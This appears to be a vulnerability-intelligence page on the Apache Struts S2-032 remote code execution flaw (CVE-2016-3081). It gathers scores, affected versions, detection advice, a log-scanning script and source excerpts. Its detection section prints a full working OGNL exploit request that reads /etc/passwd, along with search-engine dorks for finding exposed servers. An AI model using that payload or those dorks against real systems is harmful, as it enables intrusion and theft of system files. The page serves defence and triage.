CVE-2016-3081
Published: 2016-04-26
Priority: P181, high, 8.1 (CVSS 3.0)
Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 94.16% (99.8th percentile)
Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.
Affected
57 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | — | — |
Detection & IOCs (extracted from sources)
url: GET /index.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1
sigma
regex: root:.*:0:0:
- Detect exploitation attempts by monitoring HTTP requests containing the 'method:' prefix in the URI query string, particularly with OGNL expressions such as '%23_memberAccess' or '@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS'.
- Use Shodan/FOFA queries to identify exposed Apache Struts instances: search for 'http.html:"apache struts"', 'http.title:"struts2 showcase"', 'http.html:"struts problem report"', 'body="struts problem report"', 'title="struts2 showcase"', or Google dork 'intitle:"struts2 showcase"'.
- Exploitation involves chained OGNL expressions passed via the 'method:' prefix in the action URL. Monitor for URL-encoded OGNL tokens such as '%23', '@java.lang.Runtime@getRuntime().exec', and '@org.apache.struts2.ServletActionContext@getResponse()' in HTTP request URIs.
- The Metasploit module uses a canary-based check: it injects an arithmetic expression via OGNL and looks for the computed sum wrapped in a random flag string in the HTTP 200 response body. Detect this pattern in responses or WAF logs.
- Post-exploitation, the Metasploit module uploads a binary payload to /tmp/ and executes it via '/bin/sh -c'. Monitor for unexpected file creation in /tmp/ followed by chmod and shell execution on Struts application servers.
- The vulnerability is only exploitable when Dynamic Method Invocation (DMI) is explicitly enabled in the Struts 2 configuration. Installations with DMI disabled are not affected.
- Affected versions are Apache Struts 2.3.19–2.3.20.2, 2.3.21–2.3.24.1, and 2.3.25–2.3.28. Versions 2.3.20.2 and 2.3.24.2 are explicitly excluded from the vulnerable range in the Metasploit module.
- The Metasploit module targets Linux x86 only (linux/x86/meterpreter/reverse_tcp_uuid payload). Exploitation on other platforms may require different staging.
- If the application's home directory is not writable, the TMPPATH option must be overridden to a writable path for the file upload stage of exploitation to succeed.
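The request-side monitoring described in the bullets above, as an added example (not taken from any of the sources quoted on this page): it percent-decodes each query parameter of an access-log entry, finds parameters that start with `method:`, and separates plain DMI use from values that carry an OGNL expression. The combined log format, the severity labels and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# OGNL tokens this page lists as indicators inside a method: parameter.
OGNL_TOKENS = (
    "#_memberAccess",
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "@java.lang.Runtime@getRuntime",
    "@org.apache.struts2.ServletActionContext@getResponse",
)
# Assumption: combined-format access log with the request line in quotes.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A legitimate DMI target is a plain Java method name.
METHOD_NAME_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*\Z")

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2523) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return (severity, tokens): severity is None, 'dmi' or 'ognl'."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group("target"):
        return None, []
    severity, hits = None, set()
    for raw_param in m.group("target").split("?", 1)[1].split("&"):
        param = decode_fully(raw_param)
        if not param.startswith("method:"):
            continue
        expr = param[len("method:"):]
        found = {t for t in OGNL_TOKENS if t in expr}
        hits |= found
        if found or not METHOD_NAME_RE.match(expr.split("=", 1)[0]):
            severity = "ognl"  # an expression, not a method name
        else:
            severity = severity or "dmi"  # DMI in use; review if unexpected
    return severity, sorted(hits)

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Apr/2016:10:00:01 +0000] "GET /user.action?method:save=Submit HTTP/1.1" 200 512',
    '203.0.113.9 - - [26/Apr/2016:10:00:02 +0000] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23x%3d1 HTTP/1.1" 200 90',
    '203.0.113.9 - - [26/Apr/2016:10:00:03 +0000] "GET /index.action?method%3A%2523_memberAccess%253d1 HTTP/1.1" 200 90',
]
```

A `dmi` result on a server where DMI is supposed to be disabled is itself worth a configuration review; this sketch only inspects the request line, so parameters sent in a POST body need the same check applied to body logs.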
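CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.1 | HIGH | CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |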
GHSA
Apache Struts RCE Vulnerability
ghsa·2022-05-14
CVE-2016-3081 [HIGH] CWE-77 Apache Struts RCE Vulnerability
OSV
Apache Struts RCE Vulnerability
osv·2022-05-14
CVE-2016-3081 [HIGH] Apache Struts RCE Vulnerability
No detection rules found.
Exploit-DB
Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)
exploitdb·2016-05-02
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule 'Apache Struts Dynamic Method Invocation Remote Code Execution',
      'Description' => %q{
        This module exploits a remote command execution vulnerability in Apache Struts
        version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
        Execution can be performed via method: prefix when Dynamic Method Invocation
        is enabled.
      },
      'Author' => [ 'Nixawk' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2016-3081' ],
          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
        ],
      'Platform' => %w{ linux },
      'Privileged' => true,
      '
```
Nuclei
Apache S2-032 Struts - Remote Code Execution
nuclei·CVSS 8.1
Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).
Template:
```yaml
id: CVE-2016-3081

info:
  name: Apache S2-032 Struts - Remote Code Execution
  author: dhiyaneshDK
  severity: high
  description: |
    Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).
  impact: |
    Remote code execution
  remediation: |
    Upgrade to Apache Struts version 2.3.20.2, 2.3.24.2, or 2.3.28.1.
  reference:
    - https://cwiki.apache.org/confluence/display/WW
```
Metasploit
Apache Struts Dynamic Method Invocation Remote Code Execution
metasploit
This module exploits a remote command execution vulnerability in Apache Struts version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code Execution can be performed via method: prefix when Dynamic Method Invocation is enabled.
Greynoiseio
NoiseLetter October 2024
blogs_greynoiseio
Recorded Future
Turning Criminal Forum Exploit Chatter Into Vulnerability Risk Analysis
blogs_recorded_future
Editor’s Note: Some of the analysis featured in this article utilizes real-time intelligence from our new Vulnerability Intelligence Cards™. With this summarized data you can assess, prioritize, and remediate vulnerabilities with much greater speed and confidence to reduce your risk. Find out more in the “Threat Intelligence Use Cases” section of our website.
### Key Takeaways
- Recorded Future’s programmatic identification of exploit chatter for vulnerabilities leads to improved remediation prioritization. This prioritization is based on evidence-based assessment of increased adversary intent and/or capabilities.
- Recorded Future’s foreign natural language processing (NLP) adds significant value to vulnerability
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present ATTACK2VEC, a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test ATTACK2VEC on a dataset of billions of security events collected from the c
Bugzilla
CVE-2016-3081 Struts2: RCE via method: prefix when Dynamic Method Invocation is enabled (S2-032)
bugzilla·2016-04-27·CVSS 8.1
It is possible to pass a malicious expression which can be used to execute arbitrary code on server side when Dynamic Method Invocation is enabled.
External References:
https://struts.apache.org/docs/s2-032.html
Discussion:
Statement:
A previous statement by Red Hat related to this CVE, prior to August 2019, said that Apache Struts 2 is not included in any Red Hat products. This earlier statement was incorrect. While Struts 2 is not actively compiled, shipped, used, or enabled in any Red Hat provided final products, and does not cause any vulnerability in the product, struts2-core jars have been included in some products' source code packages. The inclusion was part of an import of the Go
- http://packetstormsecurity.com/files/136856/Apache-Struts-2.3.28-Dynamic-Method-Invocation-Remote-Code-Execution.html
- http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-en
- http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
- http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
- http://www.rapid7.com/db/modules/exploit/linux/http/struts_dmi_exec
- http://www.rapid7.com/db/modules/exploit/multi/http/struts_dmi_exec
- http://www.securityfocus.com/bid/87327
- http://www.securityfocus.com/bid/91787
- http://www.securitytracker.com/id/1035665
- https://struts.apache.org/docs/s2-032.html
- https://www.exploit-db.com/exploits/39756/